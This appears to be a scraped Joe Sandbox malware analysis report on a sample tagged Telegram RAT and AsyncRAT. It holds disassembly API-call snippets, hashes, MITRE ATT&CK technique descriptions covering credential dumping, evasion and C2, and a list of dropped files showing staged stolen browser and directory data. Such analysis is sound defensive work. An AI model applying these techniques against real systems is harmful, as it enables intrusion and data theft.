Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: LocalTime
String ID: %.3d$X64
API String ID: 481472006-1077770165
Opcode ID: 4535e2483cf168d653878259ef987b70984fc5d30fce2d4889138620156cecfb
Instruction ID: d28ad4f70c3e0e6950c4c1bb5917292f1c20f31b6b29687c68f1269db6ec69d7
Opcode Fuzzy Hash: 4535e2483cf168d653878259ef987b70984fc5d30fce2d4889138620156cecfb
Instruction Fuzzy Hash: BDD012A5809119EACB9097D1CC85EB9B3BCBB08301F5084A6F80B91080D724CD08EB61

Function 00C42356 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00C4236C
PostMessageW.USER32(00000000), ref: 00C42373

Part of subcall function 00C1E97B: Sleep.KERNEL32 ref: 00C1E9F3

Strings

Shell_TrayWnd, xrefs: 00C42365

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: f476d18a2971895812c34bd746b458fae733da077ff90bb4e63f18bee00a11ef
Instruction ID: d617d3ff6131a68cb65b8c4cfc5bdb9c97a3319493b60f236d00128e1ce0acf9
Opcode Fuzzy Hash: f476d18a2971895812c34bd746b458fae733da077ff90bb4e63f18bee00a11ef
Instruction Fuzzy Hash: 73D022363C23007BE2A8B331EC4FFCE7614AB02B00F0089127706EA0E0C8F0B840CA04

Function 00C42322 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00C4232C
PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00C4233F

Part of subcall function 00C1E97B: Sleep.KERNEL32 ref: 00C1E9F3

Strings

Shell_TrayWnd, xrefs: 00C42325

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: b904c19ec26aef987a0dbd641e328e048f11894050dcd05e0e358da2e9d8087f
Instruction ID: cafb4d27d05e8d19069530c57d901c68c7fdbd8adefcde7824542b19f21b2618
Opcode Fuzzy Hash: b904c19ec26aef987a0dbd641e328e048f11894050dcd05e0e358da2e9d8087f
Instruction Fuzzy Hash: CAD0223A385300B7E2A8B331EC4FFCE7A14AB01B00F008912770AEA0E0C8F0A840CA00

Function 00BEBDFD Relevance: 5.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,?,?,00000000,?,?,?,?,?,00000000,?), ref: 00BEBE93
GetLastError.KERNEL32 ref: 00BEBEA1
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00BEBEFC

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: ByteCharMultiWide$ErrorLast
String ID:
API String ID: 1717984340-0
Opcode ID: c2cc3e892794ad24281946c194266d72819e40c6334f94275217bf36a4656a91
Instruction ID: 86dc28cb73998354e7ff9a75162240cba97640e4e3520ce467cfe4efe7fbc967
Opcode Fuzzy Hash: c2cc3e892794ad24281946c194266d72819e40c6334f94275217bf36a4656a91
Instruction Fuzzy Hash: 6441A435605286ABCB218F66CC94FBBBBE5EF41310F1441E9F959572A1DB308D01DBA0

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
Tactics:	Privilege Escalation
Data Sources:	Driver: Driver Load, Process: Process Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report 6mllsKaB2q.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Telegram RAT

Threatname: AsyncRAT

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

Stealing of Sensitive Information

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

Spam, unwanted Advertisements and Ransom Demands

System Summary

Data Obfuscation

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\0129b490691f273f01d62bc479dc028d\msgid.dat

C:\Users\user\AppData\Local\50258fbd039b7763b78e3cbf6b4d4ee3\user@928100_en-CH.zip

C:\Users\user\AppData\Local\50258fbd039b7763b78e3cbf6b4d4ee3\user@928100_en-CH\Browsers\Firefox\Bookmarks.txt

C:\Users\user\AppData\Local\50258fbd039b7763b78e3cbf6b4d4ee3\user@928100_en-CH\Directories\Desktop.txt

C:\Users\user\AppData\Local\50258fbd039b7763b78e3cbf6b4d4ee3\user@928100_en-CH\Directories\Documents.txt

C:\Users\user\AppData\Local\50258fbd039b7763b78e3cbf6b4d4ee3\user@928100_en-CH\Directories\Downloads.txt

C:\Users\user\AppData\Local\50258fbd039b7763b78e3cbf6b4d4ee3\user@928100_en-CH\Directories\OneDrive.txt

C:\Users\user\AppData\Local\50258fbd039b7763b78e3cbf6b4d4ee3\user@928100_en-CH\Directories\Pictures.txt

C:\Users\user\AppData\Local\50258fbd039b7763b78e3cbf6b4d4ee3\user@928100_en-CH\Directories\Startup.txt

C:\Users\user\AppData\Local\50258fbd039b7763b78e3cbf6b4d4ee3\user@928100_en-CH\Directories\Temp.txt

Windows Analysis Report
6mllsKaB2q.exe

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre